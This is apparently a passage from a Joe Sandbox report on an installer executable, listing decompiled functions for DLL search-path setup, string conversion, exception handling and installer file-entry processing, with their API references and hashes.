			E0040457C() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t6;

				_t6 = GetModuleHandleA("kernel32.dll");
				_t2 = GetProcAddress(_t6, "SetDllDirectoryW");
				if(_t2 != 0) {
					 *_t2(0x4045dc);
				}
				_t3 = GetProcAddress(_t6, "SetSearchPathMode");
				if(_t3 != 0) {
					return  *_t3(0x8001);
				}
				return _t3;
			}

0x00404587
0x0040458f
0x00404596
0x0040459d
0x0040459d
0x004045a5
0x004045ac
0x00000000
0x004045b3
0x004045b6

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C38), ref: 00404582
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5

Strings

kernel32.dll, xrefs: 0040457D
SetDllDirectoryW, xrefs: 00404589
SetSearchPathMode, xrefs: 0040459F

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: SetDllDirectoryW$SetSearchPathMode$kernel32.dll
API String ID: 667068680-4185904062
Opcode ID: 20fd7be1ddc5b2b7e69c087b54f40fcb0d9e6e77690675e6c8211a15a2c91a2e
Instruction ID: 14447e1b91707bce7465e548d4c01d4f3efad5e13c9f9f0bfe0ce832c1803e18
Opcode Fuzzy Hash: 20fd7be1ddc5b2b7e69c087b54f40fcb0d9e6e77690675e6c8211a15a2c91a2e
Instruction Fuzzy Hash: 87D0C2D13903157BEA5532F21D83B2A208C4AC4B4972514377F15B51C3EDBD9A10496E

Uniqueness

Uniqueness Score: -1.00%

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004036B8(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E004032F4(__eax);
				if(E004032F4(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L00401224();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E00403414(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L00401224();
					_t17 = _t15;
				}
				return _t17;
			}

0x004036c2
0x004036cb
0x004036d9
0x00403710
0x00403715
0x00403717
0x00403718
0x0040371a
0x0040371f
0x00403729
0x004036db
0x004036f7
0x004036f8
0x004036fc
0x004036fd
0x00403702
0x00403702
0x0040373a

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: f753f32a0b9fdaf77e4d1ff69d55e7ba9e6a50d72f0fd6d7043043658b36e69e
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: f753f32a0b9fdaf77e4d1ff69d55e7ba9e6a50d72f0fd6d7043043658b36e69e
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Uniqueness

Uniqueness Score: -1.00%

Function 00402CCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00402CCC(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v44;
				void* __ebx;
				void* __esi;
				intOrPtr* _t29;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t45;
				void* _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t56;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr _t64;
				intOrPtr* _t67;
				intOrPtr _t70;
				intOrPtr _t73;

				_t29 = _a4;
				if(( *(_t29 + 4) & 0x00000006) == 0) {
					if( *_t29 == 0xeedface) {
						_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x18))));
						goto L6;
					} else {
						E0040285C(_t29);
						_t61 =  *0x40c008; // 0x405b58
						if(_t61 != 0) {
							_t32 =  *_t61();
							if(_t32 != 0) {
								L6:
								_t50 =  *((intOrPtr*)(_a8 + 4));
								_t45 =  *((intOrPtr*)(_t50 + 5));
								_t9 = _t50 + 9; // 0xf
								_t67 = _t9;
								_t70 = _t32;
								while(1) {
									L7:
									_t33 =  *_t67;
									__eflags = _t33;
									if(_t33 == 0) {
										break;
									}
									_t64 = _t70;
									while(1) {
										__eflags = _t33 - _t64;
										if(_t33 == _t64) {
											goto L16;
										}
										__eflags =  *((intOrPtr*)(_t33 - 0x18)) -  *((intOrPtr*)(_t64 - 0x18));
										if( *((intOrPtr*)(_t33 - 0x18)) ==  *((intOrPtr*)(_t64 - 0x18))) {
											_t40 =  *((intOrPtr*)(_t33 - 0x1c));
											_t59 =  *((intOrPtr*)(_t64 - 0x1c));
											_t54 =  *_t40;
											__eflags =  *_t40 -  *_t59;
											if( *_t40 ==  *_t59) {
												__eflags = _t59 + 1;
												E0040270C(_t40 + 1, _t54, _t59 + 1);
												if(__eflags == 0) {
													goto L16;
												}
											}
										}
										_t64 =  *((intOrPtr*)(_t64 - 0x14));
										_t33 =  *_t67;
										__eflags = _t64;
										if(_t64 != 0) {
											continue;
										}
										_t67 = _t67 + 8;
										_t45 = _t45 - 1;
										__eflags = _t45;
										if(_t45 != 0) {
											goto L7;
										}
										goto L19;
									}
									break;
								}
								L16:
								_t34 = _a4;
								__eflags =  *_t34 - 0xeedface;
								_t56 =  *((intOrPtr*)(_t34 + 0x18));
								_t51 =  *((intOrPtr*)(_t34 + 0x14));
								if( *_t34 != 0xeedface) {
									_t56 = E00402B28( *0x40c00c(), _a12);
									_t34 = _a4;
									_t51 =  *((intOrPtr*)(_t34 + 0xc));
								}
								_push( *[fs:ebx]);
								_push(_t34);
								_push(_t56);
								_push(_t51);
								 *(_t34 + 4) =  *(_t34 + 4) | 0x00000002;
								_push(_t67);
								_push(0);
								_push(_t34);
								_push(0x402da8);
								_push(_a8);
								L004011CC();
								_pop(_t48);
								_t35 = E00403154();
								_push( *_t35);
								 *_t35 = _t73;
								 *((intOrPtr*)(_v8 + 4)) = E00402DD4;
								E00402B5C(_v44, _t48, _t67);
								goto ( *((intOrPtr*)(_t48 + 4)));
							} else {
							}
						}
					}
				}
				L19:
				return 1;
			}

0x00402ccc
0x00402cd7
0x00402ce3
0x00402d06
0x00000000
0x00402ce5
0x00402ce5
0x00402cea
0x00402cf2
0x00402cf8
0x00402cfc
0x00402d08
0x00402d10
0x00402d13
0x00402d16
0x00402d16
0x00402d19
0x00402d1b
0x00402d1b
0x00402d1b
0x00402d1d
0x00402d1f
0x00000000
0x00000000
0x00402d21
0x00402d23
0x00402d23
0x00402d25
0x00000000
0x00000000
0x00402d2a
0x00402d2d
0x00402d2f
0x00402d32
0x00402d37
0x00402d39
0x00402d3b
0x00402d3e
0x00402d3f
0x00402d44
0x00000000
0x00000000
0x00402d44
0x00402d3b
0x00402d46
0x00402d49
0x00402d4b
0x00402d4d
0x00000000
0x00000000
0x00402d4f
0x00402d52
0x00402d52
0x00402d53
0x00000000
0x00000000
0x00000000
0x00402d58
0x00000000
0x00402d23
0x00402d5e
0x00402d5e
0x00402d62
0x00402d68
0x00402d6b
0x00402d6e
0x00402d7f
0x00402d81
0x00402d85
0x00402d85
0x00402d8d
0x00402d8e
0x00402d8f
0x00402d90
0x00402d95
0x00402d99
0x00402d9a
0x00402d9c
0x00402d9d
0x00402da2
0x00402da3
0x00402da8
0x00402dad
0x00402db2
0x00402db8
0x00402dc1
0x00402dcc
0x00402dd1
0x00000000
0x00402cfe
0x00402cfc
0x00402cf2
0x00402ce3
0x00402df4
0x00402df9

APIs

RtlUnwind.KERNEL32(?,00402DA8,?,00000000,0000000F,?,?,?,?), ref: 00402DA3

Strings

l[@, xrefs: 00402D70
X[@, xrefs: 00402CEA

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: X[@$l[@
API String ID: 3419175465-4074903537
Opcode ID: 1920712a56283e80004dcffa5df4ec479a5e5f95026c54e2668d0ecfa7077412
Instruction ID: 50eb130d5fb4603cf8097dc46a2f616e61d8bf2d7403d17dc3e89407b4d822bd
Opcode Fuzzy Hash: 1920712a56283e80004dcffa5df4ec479a5e5f95026c54e2668d0ecfa7077412
Instruction Fuzzy Hash: B83160742042019FC714DF05CA88A27B7E5FF88714F1585BAE948AB3E1C775EC42DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00403018(void* __esi, intOrPtr _a4, signed int _a8) {
				signed int _v12;
				void* _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				void* _t32;
				void* _t33;
				void* _t43;
				void* _t44;

				if(( *(_a4 + 4) & 0x00000006) != 0) {
					__eflags = 0;
					return 0;
				} else {
					__eax = E0040285C(__eax);
					__edx = _a8;
					_push(0);
					_push(__eax);
					_push(0x40303c);
					_push(_a8);
					L004011CC();
					__ebx = _v12;
					__eflags =  *__ebx - 0xeedface;
					__edx =  *(__ebx + 0x14);
					__eax =  *(__ebx + 0x18);
					if( *__ebx == 0xeedface) {
						L38:
						__eax = E00402BE8(__eax, __esi);
						__ecx =  *0x40c000; // 0x405c60
						__eflags = __ecx;
						if(__ecx != 0) {
							__eax =  *__ecx();
						}
						__ecx = _v12;
						__eax = 0xd9;
						__edx =  *(__ecx + 0x14);
						 *__esp =  *(__ecx + 0x14);
						_pop( *0x40c028);
						 *0x40c020 = 0xd9;
						__eflags =  *0x40c030;
						if( *0x40c030 == 0) {
							goto L46;
						} else {
							__eflags =  *0x40c414 - 1;
							if(__eflags < 0) {
								L58:
								ExitProcess( *0x40c020); // executed
							} else {
								if(__eflags == 0) {
									goto L46;
								} else {
									__eax = 0xd9;
									__eflags = 0xd9;
									if(0xd9 != 0) {
										while(1) {
											L46:
											__eax =  *0x40c024; // 0x0
											__eax = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												break;
											}
											__edx = 0;
											 *0x40c024 = 0;
											__eax =  *__eax();
										}
										__eflags =  *0x40c028;
										if( *0x40c028 != 0) {
											__eax =  *0x40c020; // 0x0
											__ebx = "  at 00000000";
											__ecx = 0xa;
											do {
												__edx = 0;
												_t15 = __eax % 0xa;
												__eax = __eax / 0xa;
												__edx = _t15;
												__dl = __dl + 0x30;
												 *__ebx = __dl;
												__ebx = __ebx - 1;
												__eflags = __eax;
											} while (__eax != 0);
											__ebx = 0x40b030;
											__eax =  *0x40c028; // 0x0
											__eax = __eax - 0x401178;
											__eflags = __eax;
											do {
												__edx = __eax;
												__edx = __eax & 0x0000000f;
												__dl =  *((intOrPtr*)(__edx + 0x403e1c));
												 *__ebx =  *((intOrPtr*)(__edx + 0x403e1c));
												__ebx = __ebx - 1;
												__eax = __eax >> 4;
												__eflags = __eax;
											} while (__eax != 0);
											__eflags =  *0x40c031;
											if( *0x40c031 != 0) {
												__eax = 0x40c204;
												__edx = "Runtime error     at 00000000";
												E00403FE4(0x40c204, "Runtime error     at 00000000") = E00403F67();
											} else {
												__eax = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
											}
										}
										0x40c038 = E00403CC8(0x40c038);
										0x40c204 = E00403CC8(0x40c204); // executed
										__eax = E004019DC(); // executed
										__eflags =  *0x40c414;
										if( *0x40c414 == 0) {
											__eax = E004030B4();
											goto L58;
										}
									}
								}
							}
						}
						__eax = E004030B4();
						 *0x40c414 = 0;
						__eax =  *0x40c020; // 0x0
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__eax = __eax + 1;
						__eflags = __eax;
						__esi =  *0x40c40c; // 0x0
						__ebx =  *0x40c408; // 0x0
						__ebp =  *0x40c404; // 0x0
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						__edx =  *0x40c00c; // 0x405b6c
						__eflags = __edx;
						if(__edx == 0) {
							L1:
							_t35 = _v12;
							_t21 =  *_v12;
							_t43 = _t21 - 0xc0000092;
							if(_t43 > 0) {
								__eflags = _t21 - 0xc0000096;
								if(__eflags > 0) {
									_t22 = _t21 - 0xc00000fd;
									__eflags = _t22;
									if(_t22 == 0) {
										_t23 = 0xca;
									} else {
										__eflags = _t22 == 0x3d;
										if(_t22 == 0x3d) {
											_t23 = 0xd9;
										} else {
											goto L32;
										}
									}
								} else {
									if(__eflags == 0) {
										_t23 = 0xda;
									} else {
										_t27 = _t21 - 0xc0000093;
										__eflags = _t27;
										if(_t27 == 0) {
											goto L27;
										} else {
											_t28 = _t27 - 1;
											__eflags = _t28;
											if(_t28 == 0) {
												_t23 = 0xc8;
											} else {
												__eflags = _t28 == 1;
												if(_t28 == 1) {
													_t23 = 0xd7;
												} else {
													goto L32;
												}
											}
										}
									}
								}
							} else {
								if(_t43 == 0) {
									L24:
									_t23 = 0xcf;
								} else {
									_t44 = _t21 - 0xc000008e;
									if(_t44 > 0) {
										__eflags = _t21 + 0x3fffff71 - 2;
										if(__eflags < 0) {
											goto L24;
										} else {
											if(__eflags == 0) {
												_t23 = 0xcd;
											} else {
												goto L32;
											}
										}
									} else {
										if(_t44 == 0) {
											_t23 = 0xc8;
										} else {
											_t32 = _t21 - 0xc0000005;
											if(_t32 == 0) {
												_t23 = 0xd8;
											} else {
												_t33 = _t32 - 0x87;
												if(_t33 == 0) {
													_t23 = 0xc9;
												} else {
													if(_t33 == 1) {
														L27:
														_t23 = 0xce;
													} else {
														L32:
														_t23 = 0xd9;
													}
												}
											}
										}
									}
								}
							}
							return E00402F6C(_t23 & 0x000000ff,  *((intOrPtr*)(_t35 + 0xc)));
						} else {
							__eax = __ebx;
							__eax =  *__edx();
							__eflags = __eax;
							if(__eax == 0) {
								goto L1;
							} else {
								__edx =  *(__ebx + 0xc);
								goto L38;
							}
						}
					}
				}
			}

0x00403023
0x00403090
0x00403092
0x00403025
0x00403025
0x0040302a
0x0040302e
0x00403030
0x00403031
0x00403036
0x00403037
0x0040303c
0x00403040
0x00403046
0x00403049
0x0040304c
0x0040306b
0x0040306b
0x00403070
0x00403076
0x00403078
0x0040307a
0x0040307a
0x0040307c
0x00403080
0x00403085
0x00403088
0x00403e41
0x00403d04
0x00403d09
0x00403d10
0x00000000
0x00403d12
0x00403d12
0x00403d19
0x00403ddf
0x00403de5
0x00403d1f
0x00403d1f
0x00000000
0x00403d21
0x00403d21
0x00403d21
0x00403d23
0x00403d29
0x00403d29
0x00403d29
0x00403d2e
0x00403d2e
0x00403d30
0x00000000
0x00000000
0x00403d32
0x00403d34
0x00403d3a
0x00403d3a
0x00403d3e
0x00403d45
0x00403d47
0x00403d4c
0x00403d51
0x00403d56
0x00403d56
0x00403d58
0x00403d58
0x00403d58
0x00403d5a
0x00403d5d
0x00403d5f
0x00403d60
0x00403d60
0x00403d64
0x00403d69
0x00403d6e
0x00403d6e
0x00403d73
0x00403d73
0x00403d75
0x00403d78
0x00403d7e
0x00403d80
0x00403d81
0x00403d81
0x00403d81
0x00403d86
0x00403d8d
0x00403da4
0x00403da9
0x00403db3
0x00403d8f
0x00403d9d
0x00403d9d
0x00403d8d
0x00403dbd
0x00403dc7
0x00403dcc
0x00403dd1
0x00403dd8
0x00403dda
0x00000000
0x00403dda
0x00403dd8
0x00403d23
0x00403d1f
0x00403d19
0x00403dea
0x00403def
0x00403df6
0x00403dfb
0x00403dfd
0x00403dff
0x00403dff
0x00403e06
0x00403e0c
0x00403e12
0x00403e18
0x00403e18
0x00403e19
0x0040304e
0x0040304e
0x00403054
0x00403056
0x00402f78
0x00402f7b
0x00402f7e
0x00402f80
0x00402f85
0x00402fb3
0x00402fb8
0x00402fcb
0x00402fcb
0x00402fd0
0x00403001
0x00402fd2
0x00402fd2
0x00402fd5
0x00402ffd
0x00402fd7
0x00000000
0x00402fd7
0x00402fd5
0x00402fba
0x00402fba
0x00402ff9
0x00402fbc
0x00402fbc
0x00402fbc
0x00402fc1
0x00000000
0x00402fc3
0x00402fc3
0x00402fc3
0x00402fc4
0x00402fd9
0x00402fc6
0x00402fc6
0x00402fc7
0x00402fed
0x00402fc9
0x00000000
0x00402fc9
0x00402fc7
0x00402fc4
0x00402fc1
0x00402fba
0x00402f87
0x00402f87
0x00402fe5
0x00402fe5
0x00402f89
0x00402f89
0x00402f8e
0x00402faa
0x00402fad
0x00000000
0x00402faf
0x00402faf
0x00402fe1
0x00402fb1
0x00000000
0x00402fb1
0x00402faf
0x00402f90
0x00402f90
0x00402fe9
0x00402f92
0x00402f92
0x00402f97
0x00402ff5
0x00402f99
0x00402f99
0x00402f9e
0x00402fdd
0x00402fa0
0x00402fa1
0x00402ff1
0x00402ff1
0x00402fa3
0x00403005
0x00403005
0x00403005
0x00402fa1
0x00402f9e
0x00402f97
0x00402f90
0x00402f8e
0x00402f87
0x00403015
0x0040305c
0x0040305c
0x0040305e
0x00403060
0x00403062
0x00000000
0x00403068
0x00403068
0x00000000
0x00403068
0x00403062
0x00403056
0x0040304c

APIs

RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037

Strings

`\@, xrefs: 00403070
l[@, xrefs: 0040304E

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: `\@$l[@
API String ID: 3419175465-1953221756
Opcode ID: 2d68c056a1e518bf1b1fbd876ab29b135f4c94a5f8cbe72f46fd212611e06d35
Instruction ID: d211256fe70af1804ec1dc0944e24e8884d8246c6077b2d6fd46780a93fe9351
Opcode Fuzzy Hash: 2d68c056a1e518bf1b1fbd876ab29b135f4c94a5f8cbe72f46fd212611e06d35
Instruction Fuzzy Hash: 6E1182352042029BD724DF18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC81E769

Uniqueness

Uniqueness Score: -1.00%

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030DC() {

				E00403094();
				 *0x40c014 = GetModuleHandleA(0);
				 *0x40c01c = GetCommandLineA();
				 *0x40c018 = 0xa;
				return 0x402e34;
			}

0x004030dc
0x004030e8
0x004030f3
0x004030f9
0x00403108

APIs

GetModuleHandleA.KERNEL32(00000000,00409C2E), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409C2E), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: file.tmpPID: 6100, Parent PID: 5992COMMON

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	58

Executed Functions

Function 0046F304 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0046F304(signed int __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v64;
				char _v65;
				signed short _v70;
				signed int _v72;
				signed short _v74;
				signed int _v76;
				signed short _v78;
				signed int _v80;
				signed short _v82;
				signed int _v84;
				char _v85;
				signed int _v86;
				char _v87;
				signed int _v92;
				struct _FILETIME _v100;
				struct _FILETIME _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v140;
				char _v160;
				signed int _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				char _v184;
				signed int _v188;
				char _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				char _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				char _v228;
				char _v232;
				intOrPtr _t540;
				intOrPtr _t541;
				signed int _t555;
				char _t572;
				signed int _t577;
				intOrPtr _t597;
				intOrPtr _t604;
				signed int _t630;
				signed int _t651;
				signed int _t669;
				signed int _t731;
				signed int _t748;
				signed int _t758;
				signed int _t768;
				signed int _t775;
				signed int _t790;
				signed int _t795;
				signed int _t798;
				signed int _t799;
				void* _t812;
				signed int _t824;
				signed int _t833;
				void* _t846;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t857;
				signed int _t867;
				signed int _t881;
				FILETIME* _t902;
				signed int _t904;
				void* _t907;
				intOrPtr _t920;
				signed int _t926;
				intOrPtr _t932;
				intOrPtr _t970;
				intOrPtr _t976;
				intOrPtr _t982;
				intOrPtr _t984;
				intOrPtr _t986;
				intOrPtr _t989;
				intOrPtr _t991;
				intOrPtr _t992;
				intOrPtr _t1002;
				intOrPtr _t1003;
				intOrPtr _t1007;
				intOrPtr _t1019;
				intOrPtr _t1022;
				intOrPtr _t1024;
				intOrPtr _t1027;
				intOrPtr _t1031;
				intOrPtr _t1040;
				intOrPtr _t1043;
				intOrPtr _t1045;
				intOrPtr _t1056;
				void* _t1063;
				void* _t1064;
				intOrPtr _t1065;
				void* _t1081;
				char _t1087;

				_t1061 = __esi;
				_t1058 = __edi;
				_t927 = __ecx;
				_t1063 = _t1064;
				_t1065 = _t1064 + 0xffffff1c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v164 = 0;
				_v208 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v64 = 0;
				_v16 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				E00403728(_v16);
				E00403728(_a12);
				_push(_t1063);
				_push(0x470539);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1065;
				E00456B58("-- File entry --", 0, __ecx, __edi, __esi);
				_v55 = 0;
				_v54 = 0;
				_t924 =  *((intOrPtr*)(_v8 + 0x3c));
				if( *((intOrPtr*)(_v8 + 0x3c)) == 0xffffffff) {
					__eflags = 0;
					_v36 = 0;
				} else {
					_t920 =  *0x49b304; // 0x2267a60
					_v36 = E0040B424(_t920, _t924);
				}
				E00403400( &_v44);
				E00403400( &_v48);
				_v56 = 0;
				_v17 = 0;
				_t540 =  *0x49b060; // 0x33c48d
				_v28 = _t540;
				_t541 =  *0x49b064; // 0x0
				_v24 = _t541;
				E00403400( &_v32);
				E00403400( &_v64);
				_push(_t1063);
				_push(0x470400);
				_push( *[fs:edx]);
				 *[fs:edx] = _t1065;
				_push(_t1063);
				_push(0x4703b7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t1065;
				_v58 = 0;
				_v92 = 0;
				if(_v9 != 0) {
					_v92 = _v92 | 0x00000800;
				}
				if(( *(_v8 + 0x4e) & 0x00000010) != 0) {
					_v92 = _v92 | 0x00000010;
				}
				if(( *(_v8 + 0x4e) & 0x00000020) != 0) {
					_v92 = _v92 | 0x00000040;
				}
				if(( *(_v8 + 0x4f) & 0x00000080) != 0) {
					_v92 = _v92 | 0x00000080;
				}
				if(( *(_v8 + 0x50) & 0x00000010) != 0) {
					_v92 = _v92 | 0x00000100;
				}
				if(( *(_v8 + 0x51) & 0x00000080) != 0) {
					_v92 = _v92 | 0x00001000;
				}
				E00403400( &_v52);
				_push(_t1063);
				_push(0x46f4b7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1065;
				_t555 = _v8;
				_t1080 =  *((intOrPtr*)(_t555 + 0x52)) != 1;
				if( *((intOrPtr*)(_t555 + 0x52)) != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						E00403494( &_v44, _a12);
					} else {
						E0047AA00( *((intOrPtr*)(_v8 + 4)), _t927,  &_v44);
					}
				} else {
					_t1056 =  *0x49b150; // 0x22a8b30
					E00403494( &_v44, _t1056);
				}
				E0042C7A8(_v44,  &_v164);
				E00403494( &_v44, _v164);
				_pop(_t970);
				 *[fs:eax] = _t970;
				E0046CDEC(_v44, _t924, 1, _t1058, _t1061, _t1080);
				_v172 = _v44;
				_v168 = 0xb;
				_t930 = 0;
				E00456D64("Dest filename: %s", _t924, 0,  &_v172, _t1058, _t1061);
				_t1081 = _v9 -  *0x49b37b; // 0x0
				if(_t1081 != 0) {
					if(_v9 == 0) {
						E00456B58("Non-default bitness: 32-bit", _t924, 0, _t1058, _t1061);
					} else {
						E00456B58("Non-default bitness: 64-bit", _t924, 0, _t1058, _t1061);
					}
				}
				_v86 = 0;
				if( *0x49b36f != 0 &&  *0x49b380 >= 0x5000000) {
					_t907 = E00453FF0(_v9, _t924, _v44, _t1058, _t1061); // executed
					if(_t907 != 0) {
						E00456B58("Dest file is protected by Windows File Protection.", _t924, _t930, _t1058, _t1061);
						_t89 =  &_v86;
						 *_t89 =  *((char*)(_v8 + 0x52)) == 0;
						_t1087 =  *_t89;
					}
				}
				_t572 = E00452100(_v9, _v44, _t1087); // executed
				_v53 = _t572;
				if(_v55 == 0) {
					_v54 = _v53;
					_v55 = 1;
				}
				if(_v54 != 0) {
					_v92 = _v92 | 0x00000001;
				}
				if(_v36 == 0) {
					_t930 =  &_v100;
					_t925 = E00453E14( &_v100, _v16, __eflags);
				} else {
					if(( *(_v36 + 0x48) & 0x00000004) == 0) {
						_t902 = _v36 + 0x38;
						__eflags = _t902;
						LocalFileTimeToFileTime(_t902,  &_v100);
					} else {
						_t904 = _v36;
						_v100.dwLowDateTime =  *(_t904 + 0x38);
						_v100.dwHighDateTime =  *((intOrPtr*)(_t904 + 0x3c));
					}
					_t925 = 1;
				}
				if(_t925 == 0) {
					E00456B58("Time stamp of our file: (failed to read)", _t925, _t930, _t1058, _t1061);
				} else {
					E0046D2B0( &_v100,  &_v164);
					_v172 = _v164;
					_v168 = 0xb;
					_t930 = 0;
					E00456D64("Time stamp of our file: %s", _t925, 0,  &_v172, _t1058, _t1061);
				}
				if(_v53 == 0) {
					_t577 = _v8;
					__eflags =  *(_t577 + 0x4f) & 0x00000020;
					if(( *(_t577 + 0x4f) & 0x00000020) == 0) {
						goto L110;
					} else {
						__eflags = _v54;
